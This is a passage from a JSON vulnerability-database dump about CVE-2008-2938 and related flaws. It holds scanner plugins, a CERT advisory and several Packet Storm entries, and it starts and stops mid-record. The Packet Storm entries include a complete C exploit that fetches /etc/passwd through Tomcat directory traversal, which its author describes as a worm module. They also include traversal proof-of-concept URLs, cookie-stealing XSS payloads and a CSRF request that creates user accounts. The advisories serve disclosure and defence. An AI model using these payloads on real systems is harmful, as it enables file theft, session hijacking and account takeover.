script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/12/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"websphere-as_ce-2.1.0.1-3.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:42:09", "description": "The remote host is running a version of Mac OS X 10.5 or 10.4 that does not have the security update 2008-007 applied. \n\nThis security update contains fixes for the following products :\n\n - Apache\n - Certificates\n - ClamAV\n - ColorSync\n - CUPS\n - Finder\n - launchd\n - libxslt\n - MySQL Server\n - Networking\n - PHP\n - Postfix\n - PSNormalizer\n - QuickLook\n - rlogin\n - Script Editor\n - Single Sign-On\n - Tomcat\n - vim\n - Weblog", "cvss3": {}, "published": "2008-10-10T00:00:00", "type": "nessus", "title": "Mac OS X Multiple Vulnerabilities (Security Update 2008-007)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-2691", "CVE-2007-4850", "CVE-2007-5333", "CVE-2007-5342", "CVE-2007-5461", "CVE-2007-5969", "CVE-2007-6286", "CVE-2007-6420", "CVE-2008-0002", "CVE-2008-0226", "CVE-2008-0227", "CVE-2008-0674", "CVE-2008-1232", "CVE-2008-1389", "CVE-2008-1678", "CVE-2008-1767", "CVE-2008-1947", "CVE-2008-2079", "CVE-2008-2364", "CVE-2008-2370", "CVE-2008-2371", "CVE-2008-2712", "CVE-2008-2938", "CVE-2008-3294", "CVE-2008-3432", "CVE-2008-3641", "CVE-2008-3642", "CVE-2008-3643", "CVE-2008-3645", "CVE-2008-3646", "CVE-2008-3647", "CVE-2008-3912", "CVE-2008-3913", "CVE-2008-3914", "CVE-2008-4101", "CVE-2008-4211", "CVE-2008-4212", "CVE-2008-4214", "CVE-2008-4215"], "modified": "2018-07-14T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "MACOSX_SECUPD2008-007.NASL", "href": "https://www.tenable.com/plugins/nessus/34374", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\nif (!defined_func(\"bn_random\")) exit(0);\nif (NASL_LEVEL < 3004) exit(0);\n\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(34374);\n script_version(\"1.31\");\n script_cvs_date(\"Date: 2018/07/14 1:59:35\");\n\n script_cve_id(\n \"CVE-2007-2691\",\n \"CVE-2007-4850\",\n \"CVE-2007-5333\",\n \"CVE-2007-5342\",\n \"CVE-2007-5461\",\n \"CVE-2007-5969\",\n \"CVE-2007-6286\",\n \"CVE-2007-6420\",\n \"CVE-2008-0002\",\n \"CVE-2008-0226\",\n \"CVE-2008-0227\",\n \"CVE-2008-0674\",\n \"CVE-2008-1232\",\n \"CVE-2008-1389\",\n \"CVE-2008-1678\",\n \"CVE-2008-1767\",\n \"CVE-2008-1947\",\n \"CVE-2008-2079\",\n \"CVE-2008-2364\",\n \"CVE-2008-2370\",\n \"CVE-2008-2371\",\n \"CVE-2008-2712\",\n \"CVE-2008-2938\",\n \"CVE-2008-3294\",\n \"CVE-2008-3432\",\n \"CVE-2008-3641\",\n \"CVE-2008-3642\",\n \"CVE-2008-3643\",\n \"CVE-2008-3645\",\n \"CVE-2008-3646\",\n \"CVE-2008-3647\",\n \"CVE-2008-3912\",\n \"CVE-2008-3913\",\n \"CVE-2008-3914\",\n \"CVE-2008-4101\",\n \"CVE-2008-4211\",\n \"CVE-2008-4212\",\n \"CVE-2008-4214\",\n \"CVE-2008-4215\"\n );\n script_bugtraq_id(\n 24016,\n 26070,\n 26765,\n 27006,\n 27140,\n 27236,\n 27413,\n 27703,\n 27706,\n 27786,\n 29106,\n 29312,\n 29502,\n 29653,\n 29715,\n 30087,\n 30279,\n 30494,\n 30496,\n 30633,\n 30795,\n 30994,\n 31051,\n 31681,\n 31692,\n 31707,\n 31708,\n 31711,\n 31715,\n 31716,\n 31718,\n 31719,\n 31720,\n 31721,\n 31722\n );\n\n script_name(english:\"Mac OS X Multiple Vulnerabilities (Security Update 2008-007)\");\n script_summary(english:\"Check for the presence of Security Update 2008-007\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a Mac OS X update that fixes various\nsecurity issues.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Mac OS X 10.5 or 10.4 that\ndoes not have the security update 2008-007 applied. \n\nThis security update contains fixes for the following products :\n\n - Apache\n - Certificates\n - ClamAV\n - ColorSync\n - CUPS\n - Finder\n - launchd\n - libxslt\n - MySQL Server\n - Networking\n - PHP\n - Postfix\n - PSNormalizer\n - QuickLook\n - rlogin\n - Script Editor\n - Single Sign-On\n - Tomcat\n - vim\n - Weblog\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://support.apple.com/kb/HT3216\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://lists.apple.com/archives/security-announce/2008/Oct/msg00001.html\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Install Security Update 2008-007 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Tomcat File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MySQL yaSSL SSL Hello Message Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(16, 20, 22, 79, 94, 119, 189, 200, 264, 352, 362, 399);\nscript_set_attribute(attribute:\"plugin_publication_date\", value: \"2008/10/10\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2007/10/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2008/10/09\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/MacOSX/packages\", \"Host/uname\");\n exit(0);\n}\n\n\nuname = get_kb_item(\"Host/uname\");\nif (!uname) exit(0);\n\nif (egrep(pattern:\"Darwin.* (8\\.[0-9]\\.|8\\.1[01]\\.)\", string:uname))\n{\n packages = get_kb_item(\"Host/MacOSX/packages\");\n if (!packages) exit(0);\n\n if (!egrep(pattern:\"^SecUpd(Srvr)?(2008-00[78]|2009-|20[1-9][0-9]-)\", string:packages))\n security_hole(0);\n}\nelse if (egrep(pattern:\"Darwin.* (9\\.[0-5]\\.)\", string:uname))\n{\n packages = get_kb_item(\"Host/MacOSX/packages/boms\");\n if (!packages) exit(0);\n\n if (!egrep(pattern:\"^com\\.apple\\.pkg\\.update\\.security\\.2008\\.007\\.bom\", string:packages))\n security_hole(0);\n}\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2021-09-28T17:51:14", "description": "### Overview\n\nApache Tomcat contains a vulnerability that may allow directory traversal. \n\n### Description\n\nApache Tomcat is an implementation of the Java Servlet and JavaServer Page (JSP) technologies. Apache Tomcat contains a vulnerability in the way malformed requests are handled. According to the [Apache Tomcat 6.x Vulnerabilities](<http://tomcat.apache.org/security-6.html>) page:\n\n \n_If a context is configured with allowLinking=\"true\" and the connector is configured with URIEncoding=\"UTF-8\" then a malformed request may be used to access arbitrary files on the server. _ \nThis vulnerability affects versions 4.1.0-4.1.37, 5.5.0-5.5.26, and 6.0.0-6.0.16. \n \nNote that we are aware of publicly-available exploit code for this vulnerability. \n--- \n \n### Impact\n\nA remote attacker could gain access to arbitrary files on the server. \n \n--- \n \n### Solution\n\n**Apply an update** \nThis vulnerability is addressed in Apache Tomcat 4.1.38, 5.5.27, and 6.0.18. Please check the [Apache Tomcat Security](<http://tomcat.apache.org/security.html>) page for availability of fixes for this and other versions of Tomcat. \n \n--- \n \n### Vendor Information\n\n343355\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Apache Tomcat __ Affected\n\nUpdated: August 19, 2008 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to <http://tomcat.apache.org/security.html> for more information.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23343355 Feedback>).\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References\n\n<http://tomcat.apache.org/security.html>\n\n### Acknowledgements\n\nThis issue was reported by William A. Rowe of Apache.\n\nThis document was written by Chris Taschner.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2008-2938](<http://web.nvd.nist.gov/vuln/detail/CVE-2008-2938>) \n---|--- \n**Severity Metric:** | 7.14 \n**Date Public:** | 2008-08-11 \n**Date First Published:** | 2008-08-19 \n**Date Last Updated: ** | 2008-08-19 20:29 UTC \n**Document Revision: ** | 5 \n", "cvss3": {}, "published": "2008-08-19T00:00:00", "type": "cert", "title": "Apache Tomcat UTF8 Directory Traversal Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-2938"], "modified": "2008-08-19T20:29:00", "id": "VU:343355", "href": "https://www.kb.cert.org/vuls/id/343355", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "packetstorm": [{"lastseen": "2016-12-05T22:24:49", "description": "", "cvss3": {}, "published": "2010-07-28T00:00:00", "type": "packetstorm", "title": "Apache Tomcat UTF-8 Directory Traversal", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2008-2938"], "modified": "2010-07-28T00:00:00", "id": "PACKETSTORM:92240", "href": "https://packetstormsecurity.com/files/92240/Apache-Tomcat-UTF-8-Directory-Traversal.html", "sourceData": "`/*Apache Tomcat < 6.0.18 UTF8 Directory Traversal Vulnerability get /etc/passwd Exploit \nc0d3r: mywisdom \nthanks for not being lame to change exploit author \ntis is one of my linux w0rm module for user enumerations, i've dual os worm \nthanks to: gunslinger,flyf666,petimati,kiddies,xtr0nic,c0mrade,n0te,v3n0m,iblis muda,cr4wl3r \nthanks to: isa m said, whitecyber \nthanks to all devilzc0de crews and members, all jasakom crews and members \n* EDB-ID: 6229 \n* CVE: 2008-2938 \n* OSVDB-ID: 47464 \n* Author: Simon Ryeo \n* Published: 2008-08-11 \n* Verified: Verified \ngreetz to inj3ct0r crews: \n31337 Inj3ct0r Members: \n \ncr4wl3r, The_Exploited, eidelweiss, SeeMe, XroGuE, agix, gunslinger_, Sn!pEr.S!Te, indoushka, \n \nSid3^effects, L0rd CrusAd3r, Th3 RDX, r45c4l, Napst3r?, etc.. \nnot so good but worth to try if our target directory structure has /usr/local/wwwroot \n \n*/ \n#include <stdio.h> \n#include <unistd.h> \n#include <stdlib.h> \n#include <string.h> \n#include <errno.h> \n#include <string.h> \n#include <netinet/in.h> \n#include <netdb.h> \n#include <sys/types.h> \n#include <sys/socket.h> \n#include <arpa/inet.h> \n#define EXPLOIT \"GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.0\\n\\n\" \n#define RCVBUFSIZE 9999 \n#define tester \"root:x\" \nvoid cls() \n{ \nchar esc = 27; \nprintf(\"%c%s\",esc,\"[2J\"); \nprintf(\"%c%s\",esc,\"[1;1H\"); \n} \nint main(int argc,char **argv) \n{ \nif(argc<2) \n{ \n/**checking argument to avoid memory wasting for useless variables in vma**/ \ncls(); \nprintf(\"\\nApache Tomcat < 6.0.18 UTF8 Directory Traversal Vulnerability get /etc/passwd Exploit\\n\"); \nprintf(\"\\nc0d3r: mywisdom\\n\"); \nprintf(\"\\nusage:./tomcatevil hotname\\n\"); \nexit(1); \n} \nelse \n{ \n \nint port=80; \nchar echobuf[RCVBUFSIZE]; \nint rval,sockfd, bytesrcv, totalbytes; \nstruct hostent *he; \nstruct sockaddr_in their_addr; \nif((he=gethostbyname(argv[1])) == NULL) \n{ \nperror(\"\\nSorry please recheck your target hostname !\\n\"); \nexit(1); \n} \nelse \n{ \nif((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) \n{ \nperror(\"socket()\"); \nexit(1); \n} \nelse \n{ \n//exploiting and try to get /etc/passwd \ntheir_addr.sin_family = AF_INET; \n \nprintf(\"\\n[-]Checking whether port %d opens or not\\n\",port); \ntheir_addr.sin_port = htons(port); \ntheir_addr.sin_addr = *((struct in_addr *)he->h_addr); \nmemset(&(their_addr.sin_zero), '\\0', 8); \nif(connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1) \n{ \nperror(\"failed to connect !!!\"); \n \n} \nelse \n{ \nprintf(\"\\n[+]Port 80 opens !!! now sending your exploit to our target\\n\"); \nif(send(sockfd, EXPLOIT,999,0)==-1) \n{ \nperror (\"send\"); \n} \nelse \n{ \ntotalbytes=0; \nwhile (totalbytes < RCVBUFSIZE) \n{ \n \nif ((bytesrcv = recv(sockfd, echobuf, RCVBUFSIZE - 1, 0)) <= 0) \n{ \n \n} \nelse \n{ \ntotalbytes += bytesrcv; \nechobuf[bytesrcv] = '\\0'; \n \n} \ntotalbytes++; \n} \n \n \n} \n \nif(echobuf) \n{ \n \nrval=strstr (echobuf, tester); \nif(rval) \n{ \nprintf(echobuf); \nprintf(\"\\n[+]w00t!!! target vulnerable! exploitation success u may see /etc/passwd above !!!\\n\"); \nexit(1); \n} \nelse \n{ \nprintf(echobuf); \nprintf(\"\\n[-]target not vulnerable !!!\\n\"); \nexit(1); \n} \n} \n \n} \nclose(sockfd); \n \n \n \n//eof exploiting \n \n} \n} \n \n} \n \n \n} \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/92240/apachetomcat-traversal.txt", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-12-05T22:20:36", "description": "", "cvss3": {}, "published": "2008-08-13T00:00:00", "type": "packetstorm", "title": "tomcat-traverse.txt", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2008-2938"], "modified": "2008-08-13T00:00:00", "id": "PACKETSTORM:69010", "href": "https://packetstormsecurity.com/files/69010/tomcat-traverse.txt.html", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \nTitle: Apache Tomcat Directory Traversal Vulnerability \nAuthor: Simon Ryeo(bar4mi (at) gmail.com, barami (at) ahnlab.com) \nSeverity: High \nImpact: Remote File Disclosure \nVulnerable Version: prior to 6.0.18 \nSolution: \n- Best Choice: Upgrade to 6.0.18 (http://tomcat.apache.org) \n- Hot fix: Disable allowLinking or do not set URIencoding to utf8 in \norder to avoid this vulnerability. \n- Tomcat 5.5.x and 4.1.x Users: The fix will be included in the next \nreleases. Please apply the hot fix until next release. \nReferences: \n- http://tomcat.apache.org/security.html \n- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2938 \nHistory: \n- 07.17.2008: Initiate notify (To Apache Security Team) \n- 08.02.2008: Responsed this problem fixed and released new version \n- 08.05.2008: Notify disclosure (To Apache Tomcat Security Team) \n- 08.10.2008: Responsed with some suggestions. \n \nDescription \nAs Apache Security Team, this problem occurs because of JAVA side. \nIf your context.xml or server.xml allows 'allowLinking'and 'URIencoding' as \n'UTF-8', an attacker can obtain your important system files.(e.g. \n/etc/passwd) \n \nExploit \nIf your webroot directory has three depth(e.g /usr/local/wwwroot), An \nattacker can access arbitrary files as below. (Proof-of-concept) \n \nhttp://www.target.com/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/foo/bar \n \n-----BEGIN PGP SIGNATURE----- \nVersion: 9.8.3.4028 \n \nwj8DBQFIn6gYzuoR/xLtCioRAi+UAJ955ydh2gH24brmZC3ZwGQJvsrwcQCguQwF \nkdtko4iGS8OJj73j2o1E83o= \n=DRmh \n-----END PGP SIGNATURE----- \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/69010/tomcat-traverse.txt", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-12-05T22:18:51", "description": "", "cvss3": {}, "published": "2009-01-21T00:00:00", "type": "packetstorm", "title": "Oracle Containers For Java Traversal", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2008-2938"], "modified": "2009-01-21T00:00:00", "id": "PACKETSTORM:74165", "href": "https://packetstormsecurity.com/files/74165/Oracle-Containers-For-Java-Traversal.html", "sourceData": "`Server Version Info: Oracle-Application-Server-10g/10.1.3.1.0 Oracle-HTTP-Server \nPoC: http://OC4J/web-app/foobar/%c0%ae%c0%ae/WEB-INF/web.xml \nRelated: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2938 \nExplaination: The \"%c0%ae%c0%ae\" is interpreted as: \"..\" because on \nJava's side: \"%c0%ae\" is interpreted as: \"\\uC0AE\" that get's casted to \nan ASCII-LOW char, that is: \".\". \n \nYou can read dangerous configuration information including passwords, \nusers, paths, etc.. \nDiscovered: 8/16/08 \nVendor contacted: 8/16/08 \nVendor response: 8/18/08 \nVendor reproduced the issue: 9/10/08 \nVendor last contact: 9/30/08 \nPublic Disclosure: 1/19/09 \n \nOracle security bug id: 7391479 \n \nFor more information contact Oracle Security Team: secalert_us@oracle.com \n \nI really wanted to give a link to a patch, but I think it's better if \nthis is known by sysadmins so they can filter this using an IDS. \n \nGreetings!! \n \n-- Eduardo \nhttp://www.sirdarckcat.net/ \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/74165/oc4j-traversal.txt", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-12-05T22:19:16", "description": "", "cvss3": {}, "published": "2009-11-17T00:00:00", "type": "packetstorm", "title": "ToutVirtual VirtualIQ Pro XSS / XSRF / Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2008-2938", "CVE-2006-3835"], "modified": "2009-11-17T00:00:00", "id": "PACKETSTORM:82649", "href": "https://packetstormsecurity.com/files/82649/ToutVirtual-VirtualIQ-Pro-XSS-XSRF-Execution.html", "sourceData": "`Secure Network - Security Research Advisory \n \nVuln name: ToutVirtual VirtualIQ Pro Multiple Vulnerabilities \nSystems affected: ToutVirtual VirtualIQ Professional 3.2 build 7882 \nSystems not affected: -- \nSeverity: High \nLocal/Remote: Remote \nVendor URL: http://www.toutvirtual.com \nAuthor(s): Alberto Trivero (a.trivero@securenetwork.it) \nClaudio Criscione (c.criscione@securenetwork.it) \nVendor disclosure: 02/07/2009 \nVendor acknowledged: 16/07/2009 \nVendor patch release: notified us on 06/11/2009 \nPublic disclosure: 07/11/2009 \nAdvisory number: SN-2009-02 \nAdvisory URL: http://www.securenetwork.it/advisories/sn-2009-02.txt \n \n \n*** SUMMARY *** \n \nToutVirtual's VirtualIQ Pro is specifically designed for IT administrators \nresponsible for managing virtual platforms. VirtualIQ Pro provides \nVisibility, Analytics and policy-based Optimization - all from one single \nconsole. VirtualIQ Pro is hypervisor-agnostic supporting both Type I and Type \nII hypervisors. VirtualIQ Pro can be used to visualize, analyze and \noptimize your choice of virtualization platform - Citrix, Microsoft, \nNovell, Oracle and/or VMware. \n \nMultiple vulnerabilities has been found which a allow an attacker to conduct \nvarious XSS and CSRF attack, and other attacks due to the use \nof an old an not hardened version of the web server. \n \n \n*** VULNERABILITY DETAILS *** \n \n(a) Cross-site scripting (XSS) \n \nDue to an improper sanitization of user's input, multiple XSS attacks \n(reflective and stored) are possible. \nReflective PoCs: \n \nhttp://server:9080/tvserver/server/user/setPermissions.jsp?userId=1\"><script>alert(1)</script>&resultResourceIds=111-222-1933email@address.tst \n \nhttp://server:9080/tvserver/server/user/addDepartment.jsp?addNewDept=0&deptName=%22;alert(1);//&deptId=1&deptDesc=asd \n \nhttp://server:9080/tvserver/server/inventory/inventoryTabs.jsp?ID=1;alert(1);// \n \nhttp://server:9080/tvserver/reports/virtualIQAdminReports.do?command=getFilter&reportName=%22%3E%3Cscript%3Ealert(1)%3C/script%3E \n \nStored XSS attacks can be triggered in the \"Middle Name\" parameter in the \n\"Edit Profile\" page with an HTTP request like the following: \n \nPOST /tvserver/user/user.do?command=save&userId=1 HTTP/1.1 \nHost: server:9080 \nCookies: JSESSIONID=[...] \n \nuserName=IQMANAGER&firstName=IQ&middleName=asd'; \nalert(document.cookie);//&lastName=MANAGER&email=user%40domain.it&password=********&retypePassword=********&redirect=null&passwordModifed=false&isReportUser=false&roleId=1&supervisorId=1&departmentId=1&locationId=1 \n \n \n(b) Cross-site request forgery (CSRF) \n \nAn attacker can perform different types of CSRF attacks against a logged user. \nHe can, for example, shutdown, start or restart an arbitrary \nvirtual machine, schedule new activities and so on. \n \nThe following HTTP request, if forged by the attacker and executed by the \nvictim while logged on VirtualIQ, creates an arbitrary user: \n \nPOST /tvserver/user/user.do?command=save&userId= HTTP/1.1 \nHost: server:9080 \nCookie: JSESSIONID=[...] \n \nuserName=asd1&firstName=asd2&middleName=asd3&lastName=asd4&email=asd5%40asd.com&password=asd6&retypePassword=asd6&redirect=null&passwordModifed=false&isReportUser=false&roleId=1&supervisorId=1&departmentId=1&locationId=1 \n \n \n(c) Web server vulnerabilities \n \nVirtualIQ runs on top of an old version of Apache Tomcat: 5.5.9, for which \nmultiple public vulnerabilities have been released. As a \nPoC, a directory traversal attack (CVE-2008-2938) \ncan be performed as: \n \nhttp://server:9080/tvserver/server/%C0%AE%C0%AE/WEB-INF/web.xml \n \nListing of an arbitrary directory (CVE-2006-3835) can also be obtained with \nthe following PoC: \n \nhttp://192.168.229.85:9080/tvserver/server/;index.jsp \n \n \n(d) Information Leakage \n \nTomcat status page should be disabled or restricted, being accessible at: \n \nhttp://status:9080/status \n \nUsername and password to access a VM through SSH are also available in clear \ntext in the configuration page. \nSince an XSS vulnerability can also be triggered in the same page, an attacker \nwould also be able to easily capture the full credentials to access \nthe VM with a specially crafted XSS payload. \n \n(e) Remote code execution \n \nJBoss JMX Management Console is exposed and can be used by remote attackers to \nexecute arbitrary commands on the system: \n \nhttp://server:9080/jmx-console/ \n \nJBoss Web Console is exposed as well and can be used by remote attackers to \nexecute any command on the system: \n \nhttp://server:9080/web-console/ \n \n \n*** EXPLOIT *** \n \nAttackers may exploit these issues through a common browser as explained \nabove. \n \n \n*** FIX INFORMATION *** \n \nUpgrade to the latest version, at the moment 3.5 build 10.14.2009 \n \n*** WORKAROUNDS *** \n \n-- \n \n \n********************* \n*** LEGAL NOTICES *** \n********************* \n \nSecure Network (www.securenetwork.it) is an information security company, \nwhich provides consulting and training services, and engages in security \nresearch and development. \n \nWe are committed to open, full disclosure of vulnerabilities, cooperating \nwhenever possible with software developers for properly handling disclosure. \n \nThis advisory is copyright 2009 Secure Network S.r.l. Permission is \nhereby granted for the redistribution of this alert, provided that it is \nnot altered except by reformatting it, and that due credit is given. It \nmay not be edited in any way without the express consent of Secure Network \nS.r.l. Permission is explicitly given for insertion in vulnerability \ndatabases and similars, provided that due credit is given to Secure Network. \n \nThe information in the advisory is believed to be accurate at the time of \npublishing based on currently available information. This information is \nprovided as-is, as a free service to the community by Secure Network \nresearch staff. There are no warranties with regard to this information. \nSecure Network does not accept any liability for any direct, indirect, \nor consequential loss or damage arising from use of, or reliance on, \nthis information. \n \nIf you have any comments or inquiries, or any issue with what is reported \nin this advisory, please inform us as soon as possible. \n \nE-mail: securenetwork@securenetwork.it \nGPG/PGP key: http://www.securenetwork.it/pgpkeys/Secure%20Network.asc \nPhone: +39 02 24 12 67 88 \n \n-- \nClaudio Criscione \n \nSecure Network S.r.l. \nVia Venezia, 23 - 20099 Sesto San Giovanni (MI) - Italia \nTel: +39 02.24126788 Mob: +39 392 3389178 \nemail: c.criscione@securenetwork.it \nweb: www.securenetwork.it \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/82649/SN-2009-02.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "openvas": [{"lastseen": "2017-07-26T08:56:14", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache-jakarta-tomcat-connectors\n apache2-jakarta-tomcat-connectors\n jakarta-tomcat\n jakarta-tomcat-doc\n jakarta-tomcat-examples\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5035120 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "cvss3": {}, "published": "2009-10-10T00:00:00", "type": "openvas", "title": "SLES9: Security update for Tomcat", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2008-2938"], "modified": "2017-07-11T00:00:00", "id": "OPENVAS:65122", "href": "http://plugins.openvas.org/nasl.php?oid=65122", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5035120.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for Tomcat\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache-jakarta-tomcat-connectors\n apache2-jakarta-tomcat-connectors\n jakarta-tomcat\n jakarta-tomcat-doc\n jakarta-tomcat-examples\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5035120 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_id(65122);\n script_version(\"$Revision: 6666 $\");\n 